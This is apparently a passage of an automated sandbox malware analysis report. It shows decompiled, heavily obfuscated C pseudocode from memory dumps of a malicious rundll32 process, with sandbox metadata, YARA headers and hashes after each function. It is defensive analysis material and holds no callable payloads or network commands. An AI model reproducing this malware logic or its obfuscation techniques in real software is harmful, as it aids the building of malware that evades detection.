                                                                      							_t319 = _t319 + 0x28;
                                                                      							_t307 =  !=  ? 1 : _t307;
                                                                      							_t274 = 0x239299c3;
                                                                      							while(1) {
                                                                      								_t251 =  *((intOrPtr*)(_t319 + 0x48));
                                                                      								goto L2;
                                                                      							}
                                                                      						}
                                                                      						if(_t274 != 0x22b04821) {
                                                                      							L26:
                                                                      							if(_t274 == 0x26ae1a3c) {
                                                                      								goto L30;
                                                                      							}
                                                                      							while(1) {
                                                                      								_t251 =  *((intOrPtr*)(_t319 + 0x48));
                                                                      								goto L2;
                                                                      							}
                                                                      						}
                                                                      						E01FF6374( *((intOrPtr*)(_t319 + 0x38)),  *_t308, _t316, _t251,  *(_t319 + 0x4c));
                                                                      						_t319 = _t319 + 0xc;
                                                                      						_t274 = 0x33e31eb3;
                                                                      						while(1) {
                                                                      							_t251 =  *((intOrPtr*)(_t319 + 0x48));
                                                                      							goto L2;
                                                                      						}
                                                                      					}
                                                                      					if(_t274 == 0x2c8b1a44) {
                                                                      						_t252 =  *0x2010400; // 0x0
                                                                      						_t254 = E01FF72A4( *(_t319 + 0x44), _t319 + 0x70,  *(_t319 + 0x3c),  *((intOrPtr*)(_t319 + 0x50)), _t274,  *((intOrPtr*)(_t319 + 0x64)),  *_t252);
                                                                      						_t319 = _t319 + 0x18;
                                                                      						if(_t254 == 0) {
                                                                      							_t274 = 0xabf6969;
                                                                      							goto L26;
                                                                      						}
                                                                      						_t274 = 0x22b04821;
                                                                      						while(1) {
                                                                      							_t251 =  *((intOrPtr*)(_t319 + 0x48));
                                                                      							goto L2;
                                                                      						}
                                                                      					}
                                                                      					if(_t274 == 0x2e2e6a11) {
                                                                      						 *((intOrPtr*)(_t308 + 4)) =  *((intOrPtr*)(_t272 + 4)) - 0x74;
                                                                      						_push(_t274);
                                                                      						_t260 = E01FF54FB( *((intOrPtr*)(_t308 + 4)));
                                                                      						 *_t308 = _t260;
                                                                      						if(_t260 == 0) {
                                                                      							goto L30;
                                                                      						}
                                                                      						_t261 =  *_t272;
                                                                      						_t274 = 0x2c8b1a44;
                                                                      						 *((intOrPtr*)(_t319 + 0x70)) = _t261;
                                                                      						_t251 = _t261 + 0x74;
                                                                      						 *((intOrPtr*)(_t319 + 0x48)) = _t261 + 0x74;
                                                                      						_t316 =  *((intOrPtr*)(_t272 + 4)) - 0x74;
                                                                      						goto L2;
                                                                      					}
                                                                      					if(_t274 == 0x3039966c) {
                                                                      						_t274 = 0xa9c22c2;
                                                                      						goto L2;
                                                                      					}
                                                                      					if(_t274 != 0x33e31eb3) {
                                                                      						goto L26;
                                                                      					}
                                                                      					_push(_t274);
                                                                      					_t305 =  *0x2010400; // 0x0
                                                                      					_t276 =  *(_t319 + 0x58);
                                                                      					E01FF4648(_t276,  *((intOrPtr*)(_t305 + 0x10)),  *((intOrPtr*)(_t319 + 0x88)), _t308 + 4,  *(_t319 + 0x34),  *(_t319 + 0x4c), _t274,  *((intOrPtr*)(_t319 + 0x64)),  *_t308);
                                                                      					_t319 = _t319 + 0x20;
                                                                      					asm("sbb ecx, ecx");
                                                                      					_t274 = (_t276 & 0xec4b0055) + 0x239299c3;
                                                                      				}
                                                                      			}




























                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (x$_M$b$q7$?$U
                                                                      • API String ID: 0-3432079992
                                                                      • Opcode ID: e362a5c821fcb55250e247287a8bff3fcc8dbb3b79d03946d08a12911980b4c5
                                                                      • Instruction ID: 6723d5c7876534198185c87b8ecb4278e1a30557ef8fb888dc27456f46a40350
                                                                      • Opcode Fuzzy Hash: e362a5c821fcb55250e247287a8bff3fcc8dbb3b79d03946d08a12911980b4c5
                                                                      • Instruction Fuzzy Hash: DAD143725087418FE368CF25C88991FBBE1FF84704F108A1DF696962A0D3B6DA49CF46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (x$_M$b$q7$?$U
                                                                      • API String ID: 0-3432079992
                                                                      • Opcode ID: 783565f6daaf8394181f1f84426d1e8f682b391c744a7ddb6f995b441d0267f5
                                                                      • Instruction ID: 4e256159ec8f87937818e378f8065cf8d6db0c7f9bb5ef4df3050836d2cfd18f
                                                                      • Opcode Fuzzy Hash: 783565f6daaf8394181f1f84426d1e8f682b391c744a7ddb6f995b441d0267f5
                                                                      • Instruction Fuzzy Hash: 1AD175B15183418FD768CF25C98991BBBF1FBC4708F108A2DF696962A0C3B6D959CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E02002C05() {
                                                                      				char _v524;
                                                                      				void* _v536;
                                                                      				intOrPtr _v540;
                                                                      				signed int _v544;
                                                                      				signed int _v548;
                                                                      				signed int _v552;
                                                                      				signed int _v556;
                                                                      				signed int _v560;
                                                                      				signed int _v564;
                                                                      				signed int _v568;
                                                                      				signed int _v572;
                                                                      				signed int _v576;
                                                                      				signed int _v580;
                                                                      				signed int _v584;
                                                                      				signed int _v588;
                                                                      				signed int _v592;
                                                                      				signed int _v596;
                                                                      				signed int _v600;
                                                                      				signed int _v604;
                                                                      				signed int _v608;
                                                                      				signed int _v612;
                                                                      				signed int _v616;
                                                                      				short* _t200;
                                                                      				void* _t208;
                                                                      				signed int _t237;
                                                                      				signed int _t238;
                                                                      				signed int _t239;
                                                                      				signed int _t240;
                                                                      				signed int _t246;
                                                                      				void* _t248;
                                                                      
                                                                      				_t248 = (_t246 & 0xfffffff8) - 0x268;
                                                                      				_v540 = 0x4aeeb3;
                                                                      				asm("stosd");
                                                                      				_t208 = 0x168467f0;
                                                                      				_t237 = 0x77;
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				_v568 = 0xd92c;
                                                                      				_v568 = _v568 >> 3;
                                                                      				_v568 = _v568 << 4;
                                                                      				_v568 = _v568 ^ 0x0001ce43;
                                                                      				_v604 = 0x418b;
                                                                      				_v604 = _v604 * 0x64;
                                                                      				_v604 = _v604 + 0xffff391d;
                                                                      				_v604 = _v604 / _t237;
                                                                      				_v604 = _v604 ^ 0x00007a4a;
                                                                      				_v596 = 0xd566;
                                                                      				_v596 = _v596 | 0xeedd709a;
                                                                      				_v596 = _v596 ^ 0xf9b8657b;
                                                                      				_t238 = 0x6f;
                                                                      				_v596 = _v596 * 0x5e;
                                                                      				_v596 = _v596 ^ 0x974b04be;
                                                                      				_v612 = 0x6f9a;
                                                                      				_v612 = _v612 | 0x3884a709;
                                                                      				_v612 = _v612 << 0xf;
                                                                      				_v612 = _v612 << 6;
                                                                      				_v612 = _v612 ^ 0xf3601087;
                                                                      				_v580 = 0x8bec;
                                                                      				_v580 = _v580 >> 9;
                                                                      				_v580 = _v580 ^ 0x2eaf309c;
                                                                      				_v580 = _v580 ^ 0x2eaf504a;
                                                                      				_v560 = 0xa090;
                                                                      				_v560 = _v560 * 9;
                                                                      				_v560 = _v560 ^ 0x0005eac7;
                                                                      				_v544 = 0x385a;
                                                                      				_v544 = _v544 ^ 0x5ab572c8;
                                                                      				_v544 = _v544 ^ 0x5ab54f08;
                                                                      				_v616 = 0x2ce0;
                                                                      				_v616 = _v616 * 0x53;
                                                                      				_v616 = _v616 | 0xcc7552e6;
                                                                      				_v616 = _v616 << 0xa;
                                                                      				_v616 = _v616 ^ 0xff7bc757;
                                                                      				_v588 = 0xba69;
                                                                      				_v588 = _v588 ^ 0x8b3f6b4e;
                                                                      				_v588 = _v588 | 0x1d9047e7;
                                                                      				_v588 = _v588 * 0x71;
                                                                      				_v588 = _v588 ^ 0x83ae1873;
                                                                      				_v600 = 0x31bb;
                                                                      				_v600 = _v600 | 0x7d88d622;
                                                                      				_v600 = _v600 >> 6;
                                                                      				_v600 = _v600 << 3;
                                                                      				_v600 = _v600 ^ 0x0fb10440;
                                                                      				_v608 = 0xa2c7;
                                                                      				_v608 = _v608 | 0x1a87515d;
                                                                      				_v608 = _v608 + 0x2205;
                                                                      				_v608 = _v608 << 0xc;
                                                                      				_v608 = _v608 ^ 0x815e66bd;
                                                                      				_v548 = 0x16a6;
                                                                      				_v548 = _v548 / _t238;
                                                                      				_v548 = _v548 ^ 0x00007853;
                                                                      				_v564 = 0xafe9;
                                                                      				_v564 = _v564 >> 6;
                                                                      				_v564 = _v564 + 0x5855;
                                                                      				_v564 = _v564 ^ 0x00006462;
                                                                      				_v572 = 0x600e;
                                                                      				_v572 = _v572 >> 0x10;
                                                                      				_v572 = _v572 + 0xffff4dcd;
                                                                      				_v572 = _v572 ^ 0xffff74cd;
                                                                      				_v576 = 0x4506;
                                                                      				_v576 = _v576 ^ 0x208744c8;
                                                                      				_t239 = 0x27;
                                                                      				_v576 = _v576 / _t239;
                                                                      				_v576 = _v576 ^ 0x00d5f9e3;
                                                                      				_v552 = 0x4cfb;
                                                                      				_t240 = 0x5d;
                                                                      				_v552 = _v552 / _t240;
                                                                      				_v552 = _v552 ^ 0x00002411;
                                                                      				_v584 = 0xa1f9;
                                                                      				_v584 = _v584 * 0x65;
                                                                      				_v584 = _v584 >> 7;
                                                                      				_v584 = _v584 + 0xffff7216;
                                                                      				_v584 = _v584 ^ 0xffffd98b;
                                                                      				_v556 = 0x4ff1;
                                                                      				_v556 = _v556 + 0xffffdafb;
                                                                      				_v556 = _v556 ^ 0x000023fd;
                                                                      				_v592 = 0xb847;
                                                                      				_v592 = _v592 ^ 0xa357aca7;
                                                                      				_v592 = _v592 * 0x3b;
                                                                      				_v592 = _v592 << 2;
                                                                      				_v592 = _v592 ^ 0x94472c8e;
                                                                      				do {
                                                                      					while(_t208 != 0xdfc3d3e) {
                                                                      						if(_t208 == 0x107f2098) {
                                                                      							_t200 = E01FFD6F0(E01FFFFBA, _v552, _v584, _v556,  &_v524, _v592, 0,  &_v524);
                                                                      						} else {
                                                                      							if(_t208 == 0x168467f0) {
                                                                      								_t208 = 0x2514110a;
                                                                      								continue;
                                                                      							} else {
                                                                      								_t255 = _t208 - 0x2514110a;
                                                                      								if(_t208 != 0x2514110a) {
                                                                      									goto L8;
                                                                      								} else {
                                                                      									_push(0x1ff12d8);
                                                                      									_push(_v612);
                                                                      									_push(_v596);
                                                                      									E01FFA4D7(_t255, _v560, _v544, _v616, _v588, E01FF5DFC(_v568, _v604, _t255),  *0x2011088 + 0x254,  &_v524,  *0x2011088 + 0x38);
                                                                      									_t200 = E02000D6D(_v600, _v608, _v548, _t202);
                                                                      									_t248 = _t248 + 0x34;
                                                                      									_t208 = 0xdfc3d3e;
                                                                      									continue;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L11:
                                                                      						return _t200;
                                                                      					}
                                                                      					_t200 = E01FFBDCC( &_v524, _v564, _v572, _v576);
                                                                      					__eflags = 0;
                                                                      					 *_t200 = 0;
                                                                      					_t208 = 0x107f2098;
                                                                      					L8:
                                                                      					__eflags = _t208 - 0x23e79497;
                                                                      				} while (__eflags != 0);
                                                                      				goto L11;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Jz$Sx$Z8$bd$,
                                                                      • API String ID: 0-4260221676
                                                                      • Opcode ID: 93b52e81e54576fc4fb60a1d9fa16e82e0d1f90e184530b595e34fe7da8a42aa
                                                                      • Instruction ID: 79bf8c60b0311dc2b4e5dda453de5d87a5952cd8dc48d33fdba59232436e7331
                                                                      • Opcode Fuzzy Hash: 93b52e81e54576fc4fb60a1d9fa16e82e0d1f90e184530b595e34fe7da8a42aa
                                                                      • Instruction Fuzzy Hash: E5912F715083419FD358CF65D88981FFBF1BB85748F108A1DF696962A0D3B68A49CF83
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Jz$Sx$Z8$bd$,
                                                                      • API String ID: 0-4260221676
                                                                      • Opcode ID: 66d0b6c60246877f17bc3dfb7a2af81e84fbea4fa8362f65fd740d4ef723ee12
                                                                      • Instruction ID: 513dfc2032b216a08de41d2f87313c5f54a61664968b66106f9f89887d9a34a2
                                                                      • Opcode Fuzzy Hash: 66d0b6c60246877f17bc3dfb7a2af81e84fbea4fa8362f65fd740d4ef723ee12
                                                                      • Instruction Fuzzy Hash: DE912E711183419FD358CF66C88981FFBE1FBC9748F508A1DF296962A0D3B58A59CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E01FF7B39(void* __ecx, void* __edx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12) {
                                                                      				char _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _v84;
                                                                      				signed int _v88;
                                                                      				signed int _v92;
                                                                      				signed int _v96;
                                                                      				signed int _v100;
                                                                      				signed int _v104;
                                                                      				signed int _v108;
                                                                      				signed int _v112;
                                                                      				signed int _v116;
                                                                      				signed int _v120;
                                                                      				unsigned int _v124;
                                                                      				signed int _v128;
                                                                      				void* _t159;
                                                                      				signed int _t184;
                                                                      				signed int _t189;
                                                                      				signed int _t190;
                                                                      				signed int _t191;
                                                                      				signed int _t192;
                                                                      				void* _t195;
                                                                      				signed int* _t216;
                                                                      				signed int* _t219;
                                                                      
                                                                      				_t216 = _a8;
                                                                      				_push(_a12);
                                                                      				_t215 = _a4;
                                                                      				_push(_t216);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t159);
                                                                      				_v84 = 0xb1cc;
                                                                      				_t219 =  &(( &_v128)[5]);
                                                                      				_v84 = _v84 << 4;
                                                                      				_v84 = _v84 ^ 0x000b391c;
                                                                      				_t195 = 0x56cb2a8;
                                                                      				_v128 = 0xbdb6;
                                                                      				_t189 = 0x75;
                                                                      				_v128 = _v128 * 0x3c;
                                                                      				_v128 = _v128 + 0xffff325f;
                                                                      				_v128 = _v128 | 0xdb930895;
                                                                      				_v128 = _v128 ^ 0xdbbbdb43;
                                                                      				_v120 = 0x3f39;
                                                                      				_v120 = _v120 / _t189;
                                                                      				_v120 = _v120 | 0x67adff47;
                                                                      				_t190 = 0x54;
                                                                      				_v120 = _v120 / _t190;
                                                                      				_v120 = _v120 ^ 0x013b8a2c;
                                                                      				_v124 = 0x6147;
                                                                      				_v124 = _v124 + 0xb97c;
                                                                      				_v124 = _v124 + 0xd90c;
                                                                      				_v124 = _v124 >> 0xe;
                                                                      				_v124 = _v124 ^ 0x00007a9c;
                                                                      				_v112 = 0x89a1;
                                                                      				_t191 = 0x58;
                                                                      				_v112 = _v112 / _t191;
                                                                      				_v112 = _v112 + 0xf8e9;
                                                                      				_v112 = _v112 >> 3;
                                                                      				_v112 = _v112 ^ 0x0000539c;
                                                                      				_v76 = 0x8cc3;
                                                                      				_v76 = _v76 + 0xac03;
                                                                      				_v76 = _v76 ^ 0x00011eb4;
                                                                      				_v116 = 0xfa45;
                                                                      				_v116 = _v116 + 0xffff9361;
                                                                      				_v116 = _v116 | 0xe6f660f2;
                                                                      				_v116 = _v116 >> 1;
                                                                      				_v116 = _v116 ^ 0x737b7b0a;
                                                                      				_v104 = 0xcf7e;
                                                                      				_v104 = _v104 << 0xe;
                                                                      				_v104 = _v104 * 0x27;
                                                                      				_v104 = _v104 ^ 0xe70cfdcc;
                                                                      				_v72 = 0x35c6;
                                                                      				_v72 = _v72 ^ 0x4611c0ec;
                                                                      				_v72 = _v72 ^ 0x4611c92f;
                                                                      				_v100 = 0x6fa4;
                                                                      				_v100 = _v100 * 0x52;
                                                                      				_v100 = _v100 | 0xcb75e14d;
                                                                      				_v100 = _v100 ^ 0xcb77ed32;
                                                                      				_v68 = 0x95e2;
                                                                      				_v68 = _v68 + 0x2a27;
                                                                      				_v68 = _v68 ^ 0x0000e822;
                                                                      				_v88 = 0xac43;
                                                                      				_v88 = _v88 * 0x58;
                                                                      				_v88 = _v88 >> 8;
                                                                      				_v88 = _v88 ^ 0x00007f70;
                                                                      				_v92 = 0x7b7b;
                                                                      				_v92 = _v92 + 0xffffa4a1;
                                                                      				_v92 = _v92 << 0xd;
                                                                      				_v92 = _v92 ^ 0x0403a3f8;
                                                                      				_v96 = 0x9efc;
                                                                      				_v96 = _v96 ^ 0x9f755fcb;
                                                                      				_t192 = 0x7a;
                                                                      				_v96 = _v96 / _t192;
                                                                      				_v96 = _v96 ^ 0x014e9ac3;
                                                                      				_v80 = 0x52a1;
                                                                      				_v80 = _v80 >> 1;
                                                                      				_v80 = _v80 ^ 0x00002d50;
                                                                      				_v108 = 0x1e90;
                                                                      				_v108 = _v108 + 0xffffb99d;
                                                                      				_v108 = _v108 + 0xd5ca;
                                                                      				_v108 = _v108 ^ 0x0000a5f7;
                                                                      				do {
                                                                      					while(_t195 != 0x56cb2a8) {
                                                                      						if(_t195 == 0x686a9af) {
                                                                      							E01FFBAD2(_v68, _v88, __eflags, _t215 + 4,  &_v64, _v92);
                                                                      						} else {
                                                                      							if(_t195 == 0xd2701c0) {
                                                                      								E01FFF834( *_t215, _v72,  &_v64, _v100);
                                                                      								_t219 =  &(_t219[2]);
                                                                      								_t195 = 0x686a9af;
                                                                      								continue;
                                                                      							} else {
                                                                      								if(_t195 == 0x104361af) {
                                                                      									_t214 =  &_v64;
                                                                      									E01FFFEE3(_t216,  &_v64, _v112, _v76, _v116, _v104);
                                                                      									_t219 =  &(_t219[4]);
                                                                      									_t195 = 0xd2701c0;
                                                                      									continue;
                                                                      								} else {
                                                                      									if(_t195 == 0x1c12ad24) {
                                                                      										_t214 = _t216[1];
                                                                      										_push(_t195);
                                                                      										_t184 = E01FF54FB(_t216[1]);
                                                                      										 *_t216 = _t184;
                                                                      										__eflags = _t184;
                                                                      										if(__eflags != 0) {
                                                                      											_t195 = 0x104361af;
                                                                      											continue;
                                                                      										}
                                                                      									} else {
                                                                      										_t227 = _t195 - 0x25d9ecfc;
                                                                      										if(_t195 != 0x25d9ecfc) {
                                                                      											goto L13;
                                                                      										} else {
                                                                      											_t216[1] = E01FF3134(_t215);
                                                                      											_t216[1] = _t216[1] + E01FFDF8A(_t215, _t214, _t227, _v108, _v80);
                                                                      											_t195 = 0x1c12ad24;
                                                                      											continue;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L16:
                                                                      						__eflags =  *_t216;
                                                                      						_t158 =  *_t216 != 0;
                                                                      						__eflags = _t158;
                                                                      						return 0 | _t158;
                                                                      					}
                                                                      					_t195 = 0x25d9ecfc;
                                                                      					 *_t216 =  *_t216 & 0x00000000;
                                                                      					__eflags =  *_t216;
                                                                      					_t216[1] = _v96;
                                                                      					L13:
                                                                      					__eflags = _t195 - 0xb99db01;
                                                                      				} while (__eflags != 0);
                                                                      				goto L16;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: {{s$"$Ga$P-${{
                                                                      • API String ID: 0-2936447301
                                                                      • Opcode ID: 39ec68ea787343e8064b98ec4664fe2485481eda1314bce75b272653a1e2ae17
                                                                      • Instruction ID: 83293d55a8cdaf50a0f7e94548da0bf389d6ad00a01ff90d28ef7714235d2e52
                                                                      • Opcode Fuzzy Hash: 39ec68ea787343e8064b98ec4664fe2485481eda1314bce75b272653a1e2ae17
                                                                      • Instruction Fuzzy Hash: AA8105725083429FD358DF25C48981FBBF1AFC8358F50891DF299962A0D7B9DA49CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: {{s$"$Ga$P-${{
                                                                      • API String ID: 0-2936447301
                                                                      • Opcode ID: cea13ba85886a609e731189476ad41596344b7230d863bf0c99a5505cd97314b
                                                                      • Instruction ID: b04fef8c0c99131cb5e939f21a8169d79f20b2761cb10c6038fbc338969a76f0
                                                                      • Opcode Fuzzy Hash: cea13ba85886a609e731189476ad41596344b7230d863bf0c99a5505cd97314b
                                                                      • Instruction Fuzzy Hash: 85812FB15183429FD768CF21C48981FBBE1BBC8358F50891DF59A962A0D3B9DA198F42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E01FF2DDF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                      				char _v556;
                                                                      				signed int _v560;
                                                                      				intOrPtr _v564;
                                                                      				intOrPtr _v568;
                                                                      				signed int _v572;
                                                                      				signed int _v576;
                                                                      				signed int _v580;
                                                                      				signed int _v584;
                                                                      				signed int _v588;
                                                                      				signed int _v592;
                                                                      				signed int _v596;
                                                                      				signed int _v600;
                                                                      				signed int _v604;
                                                                      				signed int _v608;
                                                                      				signed int _v612;
                                                                      				signed int _v616;
                                                                      				signed int _v620;
                                                                      				signed int _v624;
                                                                      				signed int _v628;
                                                                      				void* _t153;
                                                                      				signed int _t171;
                                                                      				signed int _t174;
                                                                      				void* _t178;
                                                                      				signed int _t186;
                                                                      				void* _t201;
                                                                      				signed int _t202;
                                                                      				signed int _t203;
                                                                      				signed int _t204;
                                                                      				signed int _t205;
                                                                      				signed int* _t209;
                                                                      
                                                                      				_push(_a8);
                                                                      				_t201 = __edx;
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t153);
                                                                      				_v560 = _v560 & 0x00000000;
                                                                      				_t209 =  &(( &_v628)[4]);
                                                                      				_v568 = 0x24f3a1;
                                                                      				_v564 = 0x3c9bd4;
                                                                      				_t178 = 0x32110b52;
                                                                      				_v576 = 0x263a;
                                                                      				_v576 = _v576 << 1;
                                                                      				_v576 = _v576 ^ 0x00007813;
                                                                      				_v620 = 0x4ee;
                                                                      				_t202 = 0x33;
                                                                      				_v620 = _v620 / _t202;
                                                                      				_v620 = _v620 + 0xffff352c;
                                                                      				_v620 = _v620 ^ 0xc3d5301d;
                                                                      				_v620 = _v620 ^ 0x3c2a31a1;
                                                                      				_v600 = 0x4188;
                                                                      				_v600 = _v600 + 0xffffb186;
                                                                      				_v600 = _v600 << 6;
                                                                      				_v600 = _v600 ^ 0xfffcab3f;
                                                                      				_v628 = 0xc09d;
                                                                      				_v628 = _v628 + 0xffff1566;
                                                                      				_v628 = _v628 | 0xe9e98308;
                                                                      				_v628 = _v628 << 0xf;
                                                                      				_v628 = _v628 ^ 0xeb85c3aa;
                                                                      				_v608 = 0x281d;
                                                                      				_t203 = 0x58;
                                                                      				_v608 = _v608 / _t203;
                                                                      				_v608 = _v608 | 0xeb359492;
                                                                      				_v608 = _v608 ^ 0xeb35e871;
                                                                      				_v612 = 0x4fd;
                                                                      				_t204 = 0x71;
                                                                      				_v612 = _v612 * 0x31;
                                                                      				_v612 = _v612 + 0xffff74e9;
                                                                      				_v612 = _v612 ^ 0x3f703ef4;
                                                                      				_v612 = _v612 ^ 0x3f704256;
                                                                      				_v572 = 0x8bdc;
                                                                      				_v572 = _v572 >> 6;
                                                                      				_v572 = _v572 ^ 0x00004ce8;
                                                                      				_v616 = 0xbbb9;
                                                                      				_v616 = _v616 * 0x57;
                                                                      				_v616 = _v616 + 0x295;
                                                                      				_v616 = _v616 ^ 0x9d8bead1;
                                                                      				_v616 = _v616 ^ 0x9db42d64;
                                                                      				_v592 = 0xdb3f;
                                                                      				_v592 = _v592 | 0x5fa632d8;
                                                                      				_v592 = _v592 ^ 0xb4c5443f;
                                                                      				_v592 = _v592 ^ 0xeb638af6;
                                                                      				_v624 = 0xda21;
                                                                      				_v624 = _v624 / _t204;
                                                                      				_t205 = 0x79;
                                                                      				_v624 = _v624 / _t205;
                                                                      				_v624 = _v624 | 0xd586b067;
                                                                      				_v624 = _v624 ^ 0xd586ca9a;
                                                                      				_v596 = 0x23f3;
                                                                      				_v596 = _v596 << 0x10;
                                                                      				_t206 = _v576;
                                                                      				_v596 = _v596 * 0x21;
                                                                      				_v596 = _v596 ^ 0xa2536537;
                                                                      				_v604 = 0xb869;
                                                                      				_v604 = _v604 + 0x1500;
                                                                      				_v604 = _v604 ^ 0xdf411415;
                                                                      				_v604 = _v604 ^ 0xdf41df50;
                                                                      				_v580 = 0x91ab;
                                                                      				_v580 = _v580 | 0x75cd6eed;
                                                                      				_v580 = _v580 ^ 0x75cdc157;
                                                                      				_v584 = 0x41c3;
                                                                      				_v584 = _v584 | 0x7a0b54b1;
                                                                      				_v584 = _v584 + 0x22a4;
                                                                      				_v584 = _v584 ^ 0x7a0b1750;
                                                                      				_v588 = 0xc9d8;
                                                                      				_v588 = _v588 << 6;
                                                                      				_v588 = _v588 >> 7;
                                                                      				_v588 = _v588 ^ 0x000064ee;
                                                                      				do {
                                                                      					while(_t178 != 0x5ded331) {
                                                                      						if(_t178 != 0xe6392eb) {
                                                                      							if(_t178 == 0x26ceaef1) {
                                                                      								return E01FFF1ED(_v596, _v604, _v580, _v584, _t206);
                                                                      							}
                                                                      							if(_t178 == 0x294df979) {
                                                                      								_t174 = E0200293E(_v572, _v616,  &_v556, _v592, _v624, _t206);
                                                                      								_t209 =  &(_t209[4]);
                                                                      								asm("sbb ecx, ecx");
                                                                      								_t186 =  ~_t174 & 0x034cb45d;
                                                                      								goto L9;
                                                                      							} else {
                                                                      								if(_t178 == 0x2a1b634e) {
                                                                      									_t174 = _a8( &_v556, _t201);
                                                                      									asm("sbb ecx, ecx");
                                                                      									_t186 =  ~_t174 & 0x027f4a88;
                                                                      									L9:
                                                                      									_t178 = _t186 + 0x26ceaef1;
                                                                      									continue;
                                                                      								} else {
                                                                      									if(_t178 != 0x32110b52) {
                                                                      										goto L16;
                                                                      									} else {
                                                                      										_t178 = 0xe6392eb;
                                                                      										continue;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_t171 = E02002B68(_t178, _v588);
                                                                      						_t206 = _t171;
                                                                      						_t209 = _t209 - 0xc + 0x10;
                                                                      						if(_t171 != 0xffffffff) {
                                                                      							_t178 = 0x5ded331;
                                                                      							continue;
                                                                      						}
                                                                      						return _t171;
                                                                      						L20:
                                                                      					}
                                                                      					_v556 = 0x22c;
                                                                      					if(E02001623( &_v556, _t206, _v608, _v612) == 0) {
                                                                      						_t178 = 0x26ceaef1;
                                                                      						goto L16;
                                                                      					} else {
                                                                      						_t178 = 0x2a1b634e;
                                                                      						continue;
                                                                      					}
                                                                      					goto L20;
                                                                      					L16:
                                                                      				} while (_t178 != 0x281e4e2f);
                                                                      				return _t174;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :&$VBp?$q5$L$d
                                                                      • API String ID: 0-1357951408
                                                                      • Opcode ID: 423d9219a06dae90452c3af43403f17738f56df53134a8a81c127abdb3eb428a
                                                                      • Instruction ID: 6cb3a994ae6459b05d1493f3ec34d1a4fbf94e598f0025bb66ad3526b7bbf76e
                                                                      • Opcode Fuzzy Hash: 423d9219a06dae90452c3af43403f17738f56df53134a8a81c127abdb3eb428a
